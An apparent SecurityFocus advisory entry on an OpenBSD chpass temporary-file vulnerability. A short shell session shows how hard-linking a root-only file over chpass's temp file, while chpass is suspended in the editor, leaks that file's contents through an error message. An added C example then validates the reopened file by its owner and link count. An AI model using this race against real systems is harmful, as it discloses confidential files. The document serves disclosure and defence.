OpenBSD CHPass Temporary File Link File Content Revealing Vulnerability

The following example of exploitation was made available by Marc Bevand <bevand_m@epita.fr>:

# echo "shell: secret_data" >/tmp/sec
# chmod 600 /tmp/sec
$ chpass # ^Z in the editor
[1]+ Stopped chpass
$ rm /var/tmp/pw.Loi22925
$ ln /tmp/sec /var/tmp/pw.Loi22925
$ fg # then quit the editor
chpass
chpass: secret_data: non-standard shell
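
An added example, not part of the original advisory and not OpenBSD's code: one way a privileged program can validate the temporary file when it reopens it after the editor exits. The function names and the sample files are constructed for illustration, and the ownership and link-count checks are an assumed mitigation, not the fix OpenBSD shipped.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Reopen the edited temp file and validate the descriptor itself, so the
 * checks and the later read refer to the same inode. Returns fd or -1. */
int open_edited(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW refuses symlinks; O_NONBLOCK avoids hanging on a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0) return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner ||   /* must belong to the invoking user */
        st.st_nlink != 1) {     /* a second name means a hard link  */
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed self-check in a private mkdtemp() directory: returns 1 when
 * the untouched file is accepted and the hard-linked replacement refused. */
int demo_swap(void)
{
    char dir[] = "/tmp/chk.XXXXXX", tmp[64], other[64];
    uid_t me = geteuid();                 /* owner of files created here */
    if (!mkdtemp(dir)) return -1;
    snprintf(tmp, sizeof tmp, "%s/pw.tmp", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    close(open(tmp, O_CREAT | O_WRONLY | O_EXCL, 0600));
    close(open(other, O_CREAT | O_WRONLY | O_EXCL, 0600));
    int ok = open_edited(tmp, me);        /* untouched file: accepted */
    if (ok >= 0) close(ok);
    unlink(tmp);
    int relinked = link(other, tmp);      /* pw.tmp now names "other" */
    int bad = open_edited(tmp, me);       /* link count is 2: refused */
    if (bad >= 0) close(bad);
    unlink(tmp); unlink(other); rmdir(dir);
    return ok >= 0 && relinked == 0 && bad < 0;
}

int main(void)
{
    printf("swap rejected: %s\n", demo_swap() == 1 ? "yes" : "no");
    return 0;
}
```

In a setuid program the owner argument would be the real uid of the invoking user, so a link to a file owned by another account fails the ownership test even when its link count cannot be relied on.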


 

Copyright 2010, SecurityFocus